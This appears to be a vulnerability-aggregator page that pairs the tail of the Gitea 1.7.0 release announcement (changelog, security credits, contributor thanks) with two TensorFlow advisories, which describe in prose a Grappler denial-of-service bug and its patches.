    *   Only count users own actions for heatmap contributions (#5647) (#5655)
    *   Update xorm to fix issue postgresql dumping issues (#5680) (#5692)
    *   Use correct value for “MSpan Structures Obtained” (#5706) (#5716)
    *   Fix bug on modifying sshd username (#5624)
    *   Delete tags in mirror which are removed for original repo. (#5609)
    *   Fix wrong text getting saved on editing second comment on an issue. (#5608)
    *   Fix nil pointer when adding a due date (#5587)
    *   Fix type mismatch of format string (#5574)
    *   Fix bug on upload file name (#5571)
    *   Issue is not overdue when it is on the same date #5566 (#5568)
    *   Fix indexer reindex bug when gitea restart (#5563)
    *   Fix table name typo on SQL (#5562)
    *   Synchronize SSH keys on login with LDAP + Fix SQLite deadlock on ldap ssh key deletion (#5557)
    *   Fix makefile generate buildstep (#5556)
    *   Fix nil pointer base branch bug (#5555)
    *   Fix permission check on api create org (#5523)
    *   Fix detect force push failure on deletion of protected branches (#5522)
    *   Fix approvals limitation (#5521)
    *   Fix bug when a read perm user to edit his issue (#5516)
    *   Fix adding reaction fail for read permission user (#5515)
    *   Fixing MSSQL timestamp type (#5511)
    *   Fix forgot deletion of notification when delete repository (#5506)
    *   Fix empty wiki (#5504)
    *   Fix clone wiki failed via ssh (#5503)
    *   Fix code review on mssql (#5502)
    *   Fix lfs version check warning log when using ssh protocol (#5501)
    *   Fix topic name length on database (#5493)
    *   Ensure that the `closed_at` is set for closed issues (#5449)
    *   Admin should be able to delete repos via the API even if he is not a member of the organization (#5443)
    *   Word-Break the WebHook url to prevent a ui-break (#5432)
    *   Fix forgot removed records when deleting user (#5429)
    *   Fix repository deletion when there is large number of issues in it (#5426)
    *   Fix heatmap colors for Chrome/Safari (#5421)
    *   Fix password variable shadowing (#5405)
    *   Fix dependent issue searching when gitea is run in subpath (#5392)
    *   Don’t force a password change for the admin user when creating an account via cli (#5391)
    *   API: ‘/orgs/:org/repos’: return private repos with read access (#5383)
    *   Don’t send assign webhooks when creating issue (#5365)
    *   Removing Labels via EditPullRequest API (#5348)
    *   Migration fixes for gogs (0.11.66) to gitea (1.6.0) #5318 (#5341)
    *   Fix bug when users have serval teams with different units on different repositories (#5307)
    *   Fix U2F if gitea is configured in subpath (#5302)
    *   Fix file edit change preview functionality (#5300)
    *   Update gitignore list (#5258)
    *   Fixed heatmap not working in mssql (#5248)
    *   Fixed wrong api request url for instances running in subfolders (#5247)
    *   Fix compatibility heatmap with mysql 8 (#5232)
    *   Fix data race on migrate repository (#5224)
    *   Fix sqlite and mssql lock (#5214)
    *   Fix sqlite lock (#5210)
    *   Fix: Accept web-command cli flags if web-command is commited (#5200)
    *   Fix: Add secret to all webhook’s payload where it has been missing (#5199)
    *   Fix race on updatesize (#5190)
    *   Fix create team, update team missing units (#5188)
    *   Fix sqlite lock (#5184 & #5176)
    *   Fix showing pull request link when delete a branch (#5166)
    *   Fix JSON result of empty array in heatmap data array (#5154)
    *   Update build tags for sqlite\_unlock notify (#5144)
    *   This commit will reduce join star, repo\_topic, topic tables on repo search, so that fix extra columns problem on mssql (#5136)
    *   Fix deadlock when sqlite (#5118)
    *   Add comment replies (#5104)
    *   Fix home page template regression (#5102)
    *   Fix regex to support optional end line of old section in diff hunk (#5096)
    *   LDAP via simple auth separate bind user and search base (#5055)
    *   Fix markdown image with link (#4675)
    *   Fix to 3819 - Filtering issues by tags on main screen issues (#3824)
*   ENHANCEMENT
    *   Delete organization endpoint added (#5601)
    *   Update Licenses (#5558)
    *   Support reverse proxy providing email (#5554)
    *   Add git protocol v2 support via SSH on Docker image (#5520)
    *   Add tests for api user orgs (#5494)
    *   Allow link verification for services like Mastodon (#5481)
    *   Improve team members and repositories settings UI (#5457)
    *   Remove the required class from optional ssh port in installation page (#5428)
    *   Explicitly disable Git credential helper (#5367)
    *   Setting Labels via EditPullRequest API (#5347)
    *   Implement pasting image from clipboard for browsers that supports that (#5317)
    *   Milestone issues and pull requests (#5293)
    *   Support envs on external render commands (#5278)
    *   Add option to disable automatic mirror syncing. (#5242)
    *   Remove unused db init on commands serv, update, hooks (#5225)
    *   Serve audio files using HTML5 audio tag (#5221)
    *   Pass link prefixes to external markup parsers (#5201)
    *   Add AutoHead functionality. (#5186)
    *   Fix emojis not showing in commit messages (#5168)
    *   Block registration based on email domain (#5157)
    *   Update vendor/go-sqlite3 (#5133 & #5162)
    *   Update x/net lib (#5169)
    *   Show review summary in pull requests (#5132)
    *   Use type switch (#5122)
    *   Remove duplicated if bodies (#5121)
    *   Remove check for negative length (#5120)
    *   Make switch more clear (#5119)
    *   Use named const instead of a raw string (#5115)
    *   Fix issue where ecdsa and other key types are not synced from LDAP (#5092) (#5094)
    *   Refactor: err != nil check, just return error instead (#5093)
    *   Add notification interface and refactor UI notifications (#5085)
    *   Use APP\_NAME on home page (#5048)
    *   Explicitly decide whether to use TLS in mailer’s configuration (#5024)
    *   Generate random password (#5023)
    *   UX of link account (Step 1) (#5006)
    *   Make sure argsSet verifies string isn’t empty too (#4980)
    *   Improve performance of dashboard (#4977)
    *   Keys API changes (#4960)
    *   Add must-change-password flag to cli for creating a user (#4955)
    *   Use native go method to get current user rather than environment variable (#4930)
    *   Make gitea serv use api/internal (#4886)
    *   Add support for search by uid (#4876)
    *   Allow to add organization members as collaborators on organization owned repositories (#4748)
*   BUILD
    *   Replace lint to revive (#5422)
    *   Update golang version in Dockerfile (#5246)
*   DOCS
    *   Typo in routers/api/v1/org/org.go fixed. (#5598)
    *   Update the docs for sqlite\_unlock\_notify (#5145)
    *   CN translation of docs part (#5049)
    *   Kubernetes deployment file (#5046)
*   MISC
    *   Upgrade alpine to 3.8 (#5423)
    *   Git-Trees API (#5403)
    *   Only chown directories during docker setup if necessary. Fix #4425 (#5064)

To see all user-facing changes that went into the release, check out our

full changelog.

A shoutout goes to those who reported and/or fixed security issues in this release:

*   @cezar97 (#4973)
*   @zeripath (#5705 #5669 #5631)
*   @misterpoesy (#5627)

**Help us out!**

Gitea is focused on community input and contributions. To keep a project like Gitea going we need people. **_LOTS_** of people. You can help in the following areas:

**Programming**

If you know Go or HTML/CSS/JavaScript, you may be interested in working on the code. Working on OSS may seem scary, but the best way is to try! Read the Gitea contribution guide, and then find an itch to scratch, or scratch your own!

**Translating**

Want to translate Gitea in your own language? Awesome! Join the Gitea project on Crowdin. As soon as your translation is approved, it will be pushed to the Gitea project to be used in future releases!

**Documentation**

Documentation is important, but also time consuming. If you enjoy writing and have a pretty good knowledge of English, or you would like to translate the English version to your native language, you’re very welcome to do so. Find our documentation on the main git repository here. Just fork, update the documentation and then create a pull request!

**Support**

Do you like people? Can you give calm and thought-out responses to users needing help? Then you can spend some time providing support to those who need it. Most answers can really be found in the documentation, so make sure to take some time to read it. Then, either join our chat or forums (linked below), or simply help us sort out issues and answer questions on the Gitea repository.

**Donations**

If you, or your company, want to help us out sustain our financial expenses, you can do so by donating on Open Collective.

**… or reporting bugs**

If you lack the time or knowledge to do any of the above, just using Gitea and sharing the word is enough to make us happy! One thing you can always do is to report any bugs you find on the Gitea issue tracker.

Before opening an issue, read the contribution guidelines about reporting bugs. After opening an issue, try to stick around a while to answer any questions we might have. Replies greatly help us find the root cause of an issue.

**Thanks**

This release would not have been possible without the pull requests from the following people:

*   @BetaCat0
*   @Eisfunke
*   @HarshitOnGitHub
*   @HoffmannP
*   @JulienTant
*   @Kasi-R
*   @LER0ever
*   @MoshiBin
*   @SagePtr
*   @SohnyBohny
*   @adelowo
*   @appleboy
*   @apricote
*   @bkcsoft
*   @cez81
*   @chdxD1
*   @coolaj86
*   @cristaloleg
*   @darktohka
*   @fabian-braun
*   @gaydin
*   @gregkare
*   @gzsombor
*   @inxonic
*   @jamesa
*   @jonasfranz
*   @kolaente
*   @koyuawsmbrtn
*   @lafriks
*   @lucienkerl
*   @lunny
*   @mcnesium
*   @michaelkuhn
*   @nougad
*   @romankl
*   @rstefan1
*   @rvillablanca
*   @sapk
*   @sd1998
*   @techknowlogick
*   @tenacubus
*   @typeless
*   @xor-gate
*   @zeripath

PRs and issues merged in 1.7.0.

**Get in touch**

Need help with anything? You can come on our Discord server, or if you’re more old-fashioned you can also use our forums.

CVE-2021-45325: Gitea 1.7.0 is released - Blog

Tensorflow is an Open Source Machine Learning Framework. The Grappler optimizer in TensorFlow can be used to cause a denial of service by altering a `SavedModel` such that `SafeToRemoveIdentity` would trigger `CHECK` failures. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.

CVE-2022-23579: tensorflow/dependency_optimizer.cc at a1320ec1eac186da1d03f033109191f715b2b130 · tensorflow/tensorflow

Tensorflow is an Open Source Machine Learning Framework. The Grappler optimizer in TensorFlow can be used to cause a denial of service by altering a `SavedModel` such that `IsSimplifiableReshape` would trigger `CHECK` failures. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.

**Impact**

The Grappler optimizer in TensorFlow can be used to cause a denial of service by altering a `SavedModel` such that `IsSimplifiableReshape` would trigger `CHECK` failures.

**Patches**

We have patched the issue in GitHub commits ebc1a2ffe5a7573d905e99bd0ee3568ee07c12c1, 1fb27733f943295d874417630edd3b38b34ce082, and 240655511cd3e701155f944a972db71b6c0b1bb6.

The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.

**For more information**

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Tag

#apple